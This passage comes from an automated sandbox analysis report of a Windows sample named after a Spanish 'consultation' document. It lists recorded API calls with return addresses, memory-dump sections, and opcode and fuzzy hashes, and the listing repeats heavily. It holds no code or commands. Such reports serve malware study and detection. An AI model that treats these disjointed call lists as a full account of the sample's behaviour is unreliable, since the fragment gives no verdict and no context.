                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CreateDirectoryErrorLast
                                                • String ID:
                                                • API String ID: 1375471231-0
                                                • Opcode ID: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                • Instruction ID: 9103f4137618f2f7179a3cd735c3beaeb677db9e9f97e60de6da32ac40298118
                                                • Opcode Fuzzy Hash: 90cc4c9737d43430731b600de694bcf2d45feac9894761d90dfe22e9228b7257
                                                • Instruction Fuzzy Hash: 42C04C31204A019BD6506B209F08B177A94EF50742F21C4396646F00A0DA348425DF3D
                                                APIs
                                                • MoveFileW.KERNEL32(00000000,00000000), ref: 00401696
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileMove
                                                • String ID:
                                                • API String ID: 3562171763-0
                                                • Opcode ID: 6251c18e5517084ee8ba5c9c0a6be4cc0851712c02702a55459641eaa8ba777c
                                                • Instruction ID: 60e635295c4898b6971f0d6b86fcc4365428ea47b068a52fddb524a00f4394d8
                                                • Opcode Fuzzy Hash: 6251c18e5517084ee8ba5c9c0a6be4cc0851712c02702a55459641eaa8ba777c
                                                • Instruction Fuzzy Hash: 76F0BB31608524A7DB10B7B59F4DD9E2154AF4236CB21837FF512B21D0DABDC542457F
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,?,00000000,?,?), ref: 00402823
                                                  • Part of subcall function 00406159: wsprintfW.USER32 ref: 00406166
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FilePointerwsprintf
                                                • String ID:
                                                • API String ID: 327478801-0
                                                • Opcode ID: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                • Instruction ID: 360c63f9489f710495f37cc3b83494bffb267c36335a31cc71ff2527b59642b3
                                                • Opcode Fuzzy Hash: 5f1d525169d9ce6b4f9467462e39e8872e382c374fce7961deb580ad00958b0a
                                                • Instruction Fuzzy Hash: 18E06571A00104EBD711DBA4AE45CAE7379DF00308711883BF102B40D1CAB94D529A2D
                                                APIs
                                                • WritePrivateProfileStringW.KERNEL32(00000000,00000000,?,00000000), ref: 00402343
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: PrivateProfileStringWrite
                                                • String ID:
                                                • API String ID: 390214022-0
                                                • Opcode ID: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                • Instruction ID: 442d6135041436e14d88d5d309934ead45877352a2168de0e76fd2d1165917bb
                                                • Opcode Fuzzy Hash: 196762a6526ae89b3abf44263c4053b82e560c8490a900e61fc9f6afa6b6512d
                                                • Instruction Fuzzy Hash: 3FE086319085B66BE71036F10F8DABF10589B44385B14057FB612B71C3D9FC4D8242AD
                                                APIs
                                                • SearchPathW.KERNELBASE(?,00000000,?,00000400,?,?,000000FF), ref: 00401749
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: PathSearch
                                                • String ID:
                                                • API String ID: 2203818243-0
                                                • Opcode ID: f591029e79f8f8fcd920fc775de66d6628d1ee33a8842cd7bdb8c3539a8a47b2
                                                • Instruction ID: d8de68dbe72b960966570827fcf7b95eaea009d5ef273339483d93543a2671c7
                                                • Opcode Fuzzy Hash: f591029e79f8f8fcd920fc775de66d6628d1ee33a8842cd7bdb8c3539a8a47b2
                                                • Instruction Fuzzy Hash: 9BE0D872300100ABD710DB64DE48AAA3398DF0036CF20853AE602A60C0D6B48A41873D
                                                APIs
                                                • RegOpenKeyExW.KERNELBASE(00000000,000001EE,00000000,00000022,00000000,?,?), ref: 00402D85
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: Open
                                                • String ID:
                                                • API String ID: 71445658-0
                                                • Opcode ID: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                • Instruction ID: 508f16f0b04c5eadc0d806ad76faca1178dd72643dd16b9b94500f6ee76514f5
                                                • Opcode Fuzzy Hash: 2cb17219caef5c2c057f25c6a0d5a563c17eea178cedf0001938d6a474f7be63
                                                • Instruction Fuzzy Hash: 12E04F76280108ABDB00EFA4EE46ED537DCAB14740F008021B608D70A1C674E5509768
                                                APIs
                                                • ReadFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,00414ED0,0040CED0,004033FF,0040A230,0040A230,00403303,00414ED0,00004000,?,00000000,004031AD), ref: 00405E7E
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileRead
                                                • String ID:
                                                • API String ID: 2738559852-0
                                                • Opcode ID: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                • Instruction ID: 5673304fef1064f236b213ef723108cd0aff19b739320a24e8caa41491261f20
                                                • Opcode Fuzzy Hash: 367723d41a66009c2099c483b716accd4a6fea8915a9694eb2152ff5aa97eb4c
                                                • Instruction Fuzzy Hash: 27E0B63661025ABBDF109F65DC00AAB7B6CFB05260F048436BA55E6190E635E9219AE4
                                                APIs
                                                • WriteFile.KERNELBASE(0040A230,00000000,00000000,00000000,00000000,0040ED0F,0040CED0,00403383,0040CED0,0040ED0F,00414ED0,00004000,?,00000000,004031AD,00000004), ref: 00405EAD
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FileWrite
                                                • String ID:
                                                • API String ID: 3934441357-0
                                                • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction ID: 98d10028cd881ca52753e47c7ca342dd4640a312c7922d7b1eeb81aac27e7924
                                                • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                • Instruction Fuzzy Hash: 41E0EC3226065AABDF109F55DC00EEB7F6CEB053A1F048836FD55E2190D631EA62DBE4
                                                APIs
                                                • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2987306905.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true
                                                • Associated: 00000000.00000002.2987274852.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987339691.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                • Associated: 00000000.00000002.2987366231.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_10000000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: ProtectVirtual
                                                • String ID:
                                                • API String ID: 544645111-0
                                                • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                APIs
                                                • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015AE
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: AttributesFile
                                                • String ID:
                                                • API String ID: 3188754299-0
                                                • Opcode ID: 4784776ad36cee7dacfbc570a3b89c3e4a57ef9a9f8d064079d0f4fc454e28eb
                                                • Instruction ID: c23ad3d9d814670b9e5664e680d4ed6fd6c27bb1f69e79231988cb8a8a550e85
                                                • Opcode Fuzzy Hash: 4784776ad36cee7dacfbc570a3b89c3e4a57ef9a9f8d064079d0f4fc454e28eb
                                                • Instruction Fuzzy Hash: CCD01232704104D7DB10DBA4AB4869D73A1EB40369B218577D602F21D0D6B9CA919B29
                                                APIs
                                                • SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404334
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                • Instruction ID: 8a3813f545c22c4fb684de807d70b5cf20617c54f99984af9f55df869fa0abe2
                                                • Opcode Fuzzy Hash: c2a25a807fea80bd58a61b321fa2af33aa5b35e52655131f61520799e32131e4
                                                • Instruction Fuzzy Hash: B2C09B71740700BBDA20DF649D45F5777547764701F1488797741F60E0C674D410D62C
                                                APIs
                                                • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403100,?), ref: 00403410
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: FilePointer
                                                • String ID:
                                                • API String ID: 973152223-0
                                                • Opcode ID: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                • Instruction ID: 64c0fffafe8abe290eaf2022e63b776f1a4a3bd25e2fde741040b5855636c72c
                                                • Opcode Fuzzy Hash: 1c6da78d27ebc38603b4c87e6ff41e0916c1b34e9bb95e36f46a9ca6431a4e31
                                                • Instruction Fuzzy Hash: 70B01231140300BFDA214F00DF09F057B21AB90700F10C034B344780F086711075EB0D
                                                APIs
                                                • SendMessageW.USER32(00000028,?,?,00404137), ref: 00404319
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: MessageSend
                                                • String ID:
                                                • API String ID: 3850602802-0
                                                • Opcode ID: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                • Instruction ID: 3e0bacd84e958153637e663f6e0df00a268db6e73930f78988907d41dcf2010e
                                                • Opcode Fuzzy Hash: 7bbf2f5232cd2574a5b007ccbcd78797cc8e3f4bb2dd07224d7ba7f17a9ad77c
                                                • Instruction Fuzzy Hash: 32B01235290A00FBDE214B00EE09F457E62F76C701F008478B340240F0CAB300B1DB19
                                                APIs
                                                • KiUserCallbackDispatcher.NTDLL(?,004040D0), ref: 00404302
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.2972239651.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972312395.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000044A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972358154.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.2972705956.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_CONSULTA#1604045 MATERIAL DE MUESTRA SEPTIEMBRE.jbxd
                                                Similarity
                                                • API ID: CallbackDispatcherUser
                                                • String ID:
                                                • API String ID: 2492992576-0
                                                • Opcode ID: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                • Instruction ID: ea629541fdd2228df96855dc4de4e407fdbb002a66502a1a5a86269346c048a7
                                                • Opcode Fuzzy Hash: 8a62e99fe4a67b047fdc914663d327e58adf51456459288db10dd5d3044e9a2e
                                                • Instruction Fuzzy Hash: C0A001B6644500ABCE129F90EF49D0ABBB2EBE8742B518579A285900348A364961EB59
                                                APIs
                                                • Sleep.KERNELBASE(00000000), ref: 004014EA
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.2972270846.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
